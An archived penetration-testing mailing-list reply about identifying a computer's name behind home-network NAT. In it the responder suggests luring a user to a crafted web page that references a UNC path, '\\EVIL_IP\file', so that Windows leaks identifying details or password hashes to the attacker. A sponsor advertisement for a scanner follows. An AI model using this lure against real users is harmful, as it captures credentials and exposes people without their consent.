Re: Enumeration of NAT'ed computer names

[Tim <tim-pentest () sentinelchicken org>]

> I have a need to enumerate computer names i.e. \\elvis  and \\winbox
> in a SOHO NAT'ed network.  The basic idea here is that \\elvis was used
> to commit a crime, but in order to tie \\elvis the offender, I have to
> prove that \\elvis exists on the network.   
>
> Caveat:
>
> I have to do it legally, and I can't actively penetrate the network to enumerate the names. 
>
> Any ideas would be greatly appreciated.


I have no idea if this will work, but it seems like you might be able to
sniff some goodies like this if you can lure a user to a website of your
making.  You could place a link/image/stylesheet/etc on that page which
points to a URL in UNC format (eg "\\EVIL_IP\file").  I've heard before
that you can convince Windows to send you password hashes to your
systems this way in certain situations, but not sure it'll send you what
you seek.


good luck,
tim

------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner: 

Hackers are concentrating their efforts on attacking applications on your 
website. Up to 75% of cyber attacks are launched on shopping carts, forms, 
login pages, dynamic content etc. Firewalls, SSL and locked-down servers are 
futile against web application hacking. Check your website for vulnerabilities 
to SQL injection, Cross site scripting and other web attacks before hackers do! 
Download Trial at:

http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------